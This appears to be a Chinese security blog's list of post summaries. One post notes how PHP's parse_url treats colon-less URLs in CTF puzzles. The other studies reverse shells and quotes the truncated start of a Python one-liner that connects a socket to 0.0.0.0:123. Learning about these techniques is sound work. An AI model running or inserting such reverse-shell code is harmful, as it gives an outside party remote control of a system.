摘要：前言 看师傅们的文章时发现,parse_url出现的次数较多，单纯parse_url解析漏洞的考题也有很多，在此研究一下源码(太菜了看不懂，待日后再补充Orz) 源码 分析 1. 只要请求的url里不含有冒号(:)就会被当成path解析 阅读全文

摘要：前言 昨天学习了反弹shell，对python弹shell产生了一些疑惑 python c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",123 阅读全文